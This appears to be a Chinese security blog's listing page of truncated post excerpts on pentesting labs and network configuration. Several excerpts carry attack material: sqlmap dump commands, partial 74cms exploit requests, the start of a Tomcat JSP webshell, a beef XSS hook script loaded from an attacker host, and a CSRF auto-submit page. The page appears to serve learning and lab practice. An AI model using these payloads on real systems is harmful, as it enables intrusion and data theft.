- 博客(31)
- 收藏
- 关注
原创 sqlmap使用方法
sqlmap使用方法1.GET:sqlmap -u “” --dbssqlmap -u “” -D “” --tablessqlmap -u “” -D “” -T “” --columnssqlmap -u “” -D “” -T “” -C “id,passwd” --dump2.POST:sqlmap -r 3.txt --dbs --level=3当前数据库:–current-dbs3.txt 里面参数的部分要打*3.高级用法:sqlmap -r 3.txt --users -
2022-01-04 19:45:47 493
原创 74cms v4.2.126-任意文件读取漏洞
pocPOST /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=Home&c=Members&a=register HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0Accept: text/html,application/xhtml+
2021-09-19 22:10:50 629
原创 74cms v4.2.1-v4.2.129-后台getshell漏洞复现
74cms v4.2.1-v4.2.129-后台getshell漏洞复现下载地址漏洞复现下载地址http://www.74cms.com/download/index.html漏洞复现进入后台http://127.0.0.1/74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=index&a=index抓包,修改post值POST /74cms_home_setup_v4.2.111/74
2021-09-19 20:28:11 481
原创 CVE-2016-4437(shiro)
CVE-2016-4437工具地址工具使用提升权限工具地址https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51工具使用提升权限
2021-09-18 15:50:04 129
原创 Nginx、Shiro
@TOCNginx解析漏洞漏洞描述:该漏洞利用Nginx配置错误,解析了URL地址,导致可以绕过服务器限制,从而解析PHP文件,造成命令执行的危害。风险等级:高漏洞危害:攻击者可以利用该漏洞上传木马文件,可以成功获取服务器权限。整改意见:1.修改php.ini,设置cgi.fix_pathinfo = 0。2.修改配置文件vim /etc/php5/fpm/pool.d/www.conf将security.limit_extensions=,设置为:security.limit_ext
2021-08-21 11:47:43 407
原创 Tomcat、phpMyAdmin、SQL
漏洞大全Tomcat远程代码执行phpMyAdmin远程代码执行SQL注入漏洞Jboss反序列化Tomcat远程代码执行漏洞描述:该系统使用apache tomcat/7.0.79,该版本在启用PUT请求方法后存在远程代码执行漏洞,可获取服务器权限。风险等级:高漏洞危害:攻击者可利用该漏洞获取服务器上的数据或权限。整改建议:1.禁用PUT请求方法;2.将tomcat版本升级到最新版本。脚本:<% if("023".equals(request.getParameter("pw
2021-08-21 11:46:42 170
原创 Dirsearch and Gobuster
Dirsearch and Gobuster什么是Dirsearch?使用方法什么是Gobuster?什么是Dirsearch?Dirsearch是python开发的目录扫描工具使用方法-u 链接 (url)-e 网站语言 .php-w 指定字典什么是Gobuster?
2021-08-19 19:53:06 708
原创 信息搜集之nmap
nmap什么是nmap?nmap的功能什么是nmap?网络映射器,主机扫描器,探测主机和服务,发送数据包给主机,分析响应nmap的功能1.主机发现nmap IP段/24nmap 192.168.86.0/242.端口扫描-p 1-655363.版本探测-sV4.脚本探测-sC5.系统探测-O6.详细探测-vv7.ping-sP8.-Aandroid或通用开关...
2021-08-18 08:39:47 365
原创 Fastjson反序列化
Fastjson反序列化漏洞描述漏洞描述Fastjson是json解析库。主要是将Java Bean序列化为json字符串,将Json字符串反序列化为Java Bean。
2021-08-16 22:00:08 420
原创 shiro反序列化漏洞
shiro反序列化反序列化简介什么是反序列化?漏洞原理检测方法漏洞利用修复方案反序列化简介什么是反序列化?首先了解序列化和反序列化地概念序列化:将对象转换成字节序列的过程。反序列化:将字节序列转换成对象的过程。漏洞原理Apache shiro框架提供rememberme的功能,用户登录成功后,会生成一个cookie,该cookie的值是经过相关信息序列化,然后AES加密,Base64编码处理成的。在服务器接收到cookie之后1.先检索rememberme cookie的值2.Base64
2021-08-15 21:38:04 942
原创 IPsec补充
nat策略nat问题修改再次测试nat新建nat策略新建安全策略配置完成后即可访问外网1.1.1.1问题但是再ping192.168.20.1ping不通地址流量发生干扰用pc2去pingpc1依然可以通修改在nat策略中目的地址加上一个反选的192.168.20.0/24再次测试ping通在防火墙中查看这条命令...
2021-07-04 16:02:50 86
原创 IPsec
IPsec拓扑图基本配置图形界面第一台防火墙网络-接口g1/0/0配置静态路由策略名称IPsec第二台防火墙测试查错拓扑图基本配置ISPsysy ISPint g0/0/0ip add 200.1.1.1 24int g0/0/1ip add 200.1.2.1 24qint l0ip add 1.1.1.1 32q防火墙初始用户名:admin密码Admin@123修改过的密码为QWEasd123sysys FW1int g0/0/0ip add 192.168
2021-07-03 23:11:56 1907
原创 SSL协议
SSLSSL简介网络拓扑基本配置配置完成进入图形界面网络对象授权策略接口配置访问SSL简介安全套接层在TCP层和应用层之间网络拓扑基本配置路由器AR1sysy AR1int g0/0/0ip add 200.1.1.1 24int g0/0/1ip add 200.1.2.1 24qFW防火墙默认用户名为:admin密码为Admin@123修改密码为QWEasd123sysy FWint g0/0/0ip add 192.168.220.10 24int
2021-07-03 14:32:47 261
原创 xss漏洞---beef应用
xss漏洞实验环境实验步骤get cookieredirect browser(iframe)实验环境beef、Windows10、kali实验步骤get cookie将cookie的值添加到一个浏览器的页面然后将一个登进去的页面的链接复制过来发现直接登进去了不需要账号和密码redirect browser(iframe)new title ----名字new favicon-----角标https://dss0.bdstatic.com/-0U0bnSm1A5BphGln
2021-06-26 23:03:58 135
原创 xss漏洞进阶
xssxss漏洞利用xss漏洞利用1.安装beefapt-get updateapt-get install bee-xss2.配置密码/etc/beef-xss/config.yaml默认用户名为beef默认密码为beef修改密码为123456注意密码要用引号引起来3.启动服务beef-xss可以看到生成的链接 Web UI: http://127.0.0.1:3000/ui/panel Hook: <script src="http://<IP>:300
2021-06-26 19:51:13 182
原创 csrf(post)
csrf实验准备实验环境实验步骤实验准备实验环境卡利、xshell、火狐浏览器、burpsuite实验步骤1.实验所需脚本111qqq.php<html><head><script>window.onload = function() { document.getElementById("postsubmit").click();}</script></head><body><form metho
2021-06-26 16:06:12 416
原创 csrf(get)
csrf简介实验csrf (get)简介跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作 的攻击方法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是
2021-06-20 18:27:34 566 2
原创 redhat--启动流程和服务管理
启动流程和服务管理运行设置及查看文本模式和图形模式切换修改语言设置的三种方式服务控制运行设置及查看文本模式和图形模式切换临时切换为文本模式systemctl isolate multi-user.target 临时切换为图形模式systemctl isolate graphical.target开机默认为文本模式systemctl set-default multi-user.target开机默认为图形模式systemctl set-default graphical.target
2021-06-12 16:28:05 480
原创 sql注入
复制sql注入数字型字符型搜索型xx型布尔盲注基于时间盲注显错注入insert/update注入insertupdatedelete注入http headeruser-agentcookie宽字节数字型在pikachu上面选择数字4后抓包在包里将数字改为1‘Send发现数据报错如下图所示id=1 and 1=1#数字型不需要单引号,双引号闭合,所以更容易受到攻击id=1 union select 1,2 #id=1 union select 1,database()#
2021-06-10 17:20:39 111
原创 xss漏洞1
xss漏洞简介xss脚本报警弹窗脚本访问网页脚本cookie脚本不断刷新脚本危害三级目录简介 XSS最大的特点就是能够注入恶意的HTML/JavaScritp代码到用户浏览的页面上,从而达到劫持用户会话的目的。究其原因,是由于web应用程序对用户的输入过滤不严造成的,当用户浏览带有恶意代码的网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能够在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端。在这个基础上黑客可以轻易的发起cookie资料窃取,会话劫持,钓鱼
2021-06-10 10:01:45 454 2
原创 暴力破解----medusa和hydra
信息搜集设备网络(均为nat)medusahydra设备kaliRedhat网络(均为nat)kali和Redhat互通查看kali和redhat的ip证明网络没有问题medusaM 加协议 如ssh(22),ftp(21)h 加IP地址u 加用户名P 加字典 如/usr/share/seclists/Passwords/bt4-password.txtF 表示扫到第一个有效的用户名和密码就停止t 表示多线程
2021-05-12 22:14:58 330
原创 信息搜集1----Oneforall
Oneforall实验环境实验步骤1.克隆oneforall2.安装插件requirements.txt3.扫描tjise.edu.cn4.获取文件5.导出文件6.分析文件实验环境emeditorkalipython3pip3apt-get install python3apt-get install python3-pip实验步骤1.克隆oneforallgit clone https://gitee.com/shmilylty/OneForAll.git2.安装插件requi
2021-05-12 08:15:57 580
原创 kali终端打不开以及msfconsole打不开
卡利出现的问题 kali终端terminal emulator打不开kali中msfconsole打不开kali终端terminal emulator打不开解决方法 1.crtl + alt +F6 2.sudo apt install x-window-system-core xfce4 -y 3.重启 (reboot) kali中msfconsole打不开如下图所示:解决办法:gem update --system...
2021-05-08 18:06:38 2207
原创 NAT技术1
NAT技术1一、 NAT静态路由二、 NAT动态路由(no-pat)一、 NAT静态路由配置AR4int g0/0/0ip add 192.168.1.254 24int g0/0/1ip add 192.168.1.10 24nat static global 200.1.1.1 inside 192.168.1.1nat static global 200.1.1.2 inside 192.168.1.2测试:ping -a 192.168.1.1 200.1.1.20二、
2021-04-25 16:28:00 93
原创 三层交换进阶版
三层交换进阶配置环境配置设备:配置环境配置设备:一台S5700交换机一台S3700交换机一台AR2220路由器两台PC从底向上配,先配PC,再配二层交换机,最后配三层交换机和路由器
2021-04-13 15:09:58 113
原创 三层交换
三层交换一、背景二、三层交换的配置一、背景单臂路由的缺陷:一条链路承载多个vlan,很容易形成瓶颈。路由器的接口有限,即使使用单臂路由,也无法满足需要。三层交换:解决单臂路由的缺陷,提供高速转发功能三层交换机(二层交换机+路由器)通过vlan虚拟接口来实现 vlanif路由接口,既可以设置IP也可以作为网关二、三层交换的配置设备:一台交换机S5700四台PC:PC1、PC2、PC3、PC4PC配置:IP地址:192.168.10.1子网掩码:255.255.255.0网关:
2021-04-13 10:47:21 252
原创 单臂路由
单臂路由环境搭建抓包分析环境搭建设备:1个S5700交换机1个AR2220路由器PC1PC2交换机配置:vlan batch 10 20int g0/0/3port link-type trunk port trunk allow-pass vlan 10 20 int g0/0/1port link-type accessport default vlan 10port link-type accessport default vlan 20display vlan
2021-04-12 19:37:39 242
原创 IP路由器
路由器前言IP路由器二级目录三级目录前言交换机工作在数据链路层,用于网络内部的数据转发;路由器则负责不同网络的数据转发。IP路由器IP路由表:目标地址网络掩码下一跳逃出接口路由优先级:取值越小,优先级越高Direct 0OPSF 10Static 60RIP 100路由度量:开销值,开销值越小,越优先。最长匹配原则:路由器会选择一个网络掩码最长的目标IP地址路由器转发数据包:下一跳和逃出接口可以只写下一跳,但是不能只写逃出接口,最好都写上路由器的寻址功能:跨网段通信,路
2021-04-11 17:25:20 225
原创 RSTP MSTP
RSTP MSTP一、 STP的不足stp不足----端口角色stp不足----端口状态二、RSTP对STP的改进端口角色和端口状态的重新转发端口角色的重新划分端口状态的重新划分快速收敛机制根端口快速切换机制次等BPDU处理机制边缘端口的引入拓扑变化处理机制保护功能MSTP单生成树的弊端配置实现一、 STP的不足1.stp从初始化到完全收敛至少需要30s以上2.交换机有RP和BP两个端口,当RP端口down掉后,BP端口转换成RP 端口并进入转发的状态至少需要30s3.交换机无BP端口,有RP端口和
2021-04-08 11:05:09 475
原创 stp技术
STP一、STP技术概念冗余拓扑二、生成树协议(802.1d)协议内容STP操作BPDUSTP的路径成本网桥id(bid)一、STP技术概念冗余拓扑优点:减少单点故障,增加网络的可靠性缺点:广播风暴、多帧复制、MAC地址抖动二、生成树协议(802.1d)协议内容协议内容:1.将冗余的端口设为“堵塞状态”2.只有一条链路可以生效3.当出现故障时,堵塞状态打开STP操作 1.每个广播域选择一个根桥 2.每个非根桥选择一个根端口 3.每个段
2021-04-06 19:29:25 584
原创 trunk
trunk前言一、为什么需要trunk?二、trunk的实现的原理1.802.1Q2.vlan标签三、trunk配置及部署场景trunk配置四、native vlan(本征vlan)1.本征vlan2.本征vlan的通信过程3.修改本征vlan五、GVRP---解决vlan信息同步1.GVRP端口注册模式2.GVRP的相关命令前言为了实现三台交换机各个vlan通信一、为什么需要trunk?当一条链路,需要承载多个vlan信息的时候,需要使用trunk来实现二、trunk的实现的原理1.8.
2021-04-05 18:33:39 1162
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人